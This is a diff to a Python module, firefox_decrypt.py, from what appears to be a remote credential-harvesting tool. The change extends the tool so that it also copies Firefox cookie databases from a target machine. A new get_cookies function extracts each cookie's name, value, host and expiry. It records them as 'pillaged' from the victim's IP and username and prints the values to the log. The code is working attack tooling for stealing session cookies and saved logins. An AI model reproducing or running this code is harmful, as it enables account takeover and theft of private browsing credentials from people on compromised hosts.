■ ■ ■ ■ ■ ■ ■
software/browser/firefox_decrypt.py
| skipped 58 lines |
59 | 59 | | try: |
60 | 60 | | self.logging.debug(f"[{self.options.target_ip}] [+] Found {bcolors.OKBLUE}{self.user.username}{bcolors.ENDC} Mozilla Profile Directory : {longname}") |
61 | 61 | | # Downloading profile important files |
62 | | - | for file_to_dl in ['signons.sqlite','logins.json','key3.db', 'key4.db']: |
| 62 | + | for file_to_dl in ['signons.sqlite','logins.json','key3.db', 'key4.db','cookies.sqlite','cookies.sqlite-wal','cookies.sqlite-shm']: |
63 | 63 | | try: |
64 | 64 | | localfile = self.myfileops.get_file(ntpath.join(ntpath.join(tmp_pwd, longname),file_to_dl),allow_access_error=True) |
| 65 | + | if file_to_dl=='cookies.sqlite' and localfile : |
| 66 | + | self.get_cookies(localfile) |
| 67 | + | |
65 | 68 | | except Exception as ex: |
66 | 69 | | self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception Getting Files for Mozilla{bcolors.ENDC}") |
67 | 70 | | self.logging.debug(ex) |
| skipped 7 lines |
75 | 78 | | self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception FIREFOX get_files{bcolors.ENDC}") |
76 | 79 | | self.logging.debug(ex) |
77 | 80 | | return None |
| 81 | + | |
| 82 | + | def get_cookies(self,localfile): |
| 83 | + | """ |
| 84 | + | Get encrypted data (user / password) and host from the json or sqlite files |
| 85 | + | """ |
| 86 | + | try: |
| 87 | + | conn = sqlite3.connect(localfile) |
| 88 | + | c = conn.cursor() |
| 89 | + | c.execute('SELECT name,value,host,path,expiry,isSecure FROM moz_cookies;') |
| 90 | + | |
| 91 | + | # Using sqlite3 database |
| 92 | + | for row in c: |
| 93 | + | name = row[0] |
| 94 | + | value = row[1] |
| 95 | + | host = row[2] |
| 96 | + | path = row[3] |
| 97 | + | expiry = row[4] |
| 98 | + | self.db.add_cookies(credz_type='browser-firefox', |
| 99 | + | credz_name=name, |
| 100 | + | credz_value=value, |
| 101 | + | credz_expires_utc=expiry, |
| 102 | + | credz_target=host, |
| 103 | + | credz_path=path, |
| 104 | + | pillaged_from_computer_ip=self.options.target_ip, |
| 105 | + | pillaged_from_username=self.user) |
| 106 | + | self.logging.info( |
| 107 | + | f"[{self.options.target_ip}] [+] {bcolors.OKGREEN}[Mozilla Cookie] {bcolors.ENDC} for {host} {bcolors.OKBLUE}[ {name}:{value} ] {bcolors.ENDC} expire time: {(datetime.fromtimestamp(expiry)).strftime('%b %d %Y %H:%M:%S')}") |
| 108 | + | return 1 |
| 109 | + | except Exception as ex: |
| 110 | + | self.logging.debug(f"[{self.options.target_ip}] Firefox Cookie decoding exception : {ex}") |
78 | 111 | | |
79 | 112 | | def run(self): |
80 | 113 | | #Download needed files |
| skipped 53 lines |